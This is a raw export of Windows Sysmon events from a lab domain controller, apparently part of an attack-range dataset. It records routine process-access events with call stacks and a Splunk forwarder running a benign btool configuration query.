09:20:18.276{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053566Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.276{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053565Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.276{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053564Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.276{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053563Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.276{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053562Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.276{5EBD8912-8CBD-6151-0500-00000000FD01}416500C:\Windows\system32\csrss.exe{5EBD8912-8CD2-6151-4100-00000000FD01}3720C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053561Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.276{5EBD8912-8CD2-6151-4000-00000000FD01}37083712C:\Windows\system32\cmd.exe{5EBD8912-8CD2-6151-4100-00000000FD01}3720C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001053560Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.288{5EBD8912-8CD2-6151-4100-00000000FD01}3720C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list kvstore --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{5EBD8912-8CD2-6151-4000-00000000FD01}3708C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list kvstore --no-log 10341000x80000000000000001053559Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.276{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8CD2-6151-4000-00000000FD01}3708C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053558Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.276{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053557Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.276{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053556Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.276{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053555Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.276{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053554Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.276{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053553Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.276{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053552Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.276{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053551Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.276{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053550Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.276{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053549Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.276{5EBD8912-8CBD-6151-0500-00000000FD01}416432C:\Windows\system32\csrss.exe{5EBD8912-8CD2-6151-4000-00000000FD01}3708C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053548Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.276{5EBD8912-8CD1-6151-3700-00000000FD01}34803484C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{5EBD8912-8CD2-6151-4000-00000000FD01}3708C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+6665|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+14ab4|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+d1d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001053547Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.282{5EBD8912-8CD2-6151-4000-00000000FD01}3708C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list kvstore --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{5EBD8912-8CD1-6151-3700-00000000FD01}3480C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_args 10341000x80000000000000001053546Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.245{5EBD8912-8CD2-6151-3F00-00000000FD01}36843688C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053545Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.009{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8CD2-6151-3F00-00000000FD01}3684C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053544Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.009{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053543Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.009{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053542Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.009{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053541Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.009{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053540Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 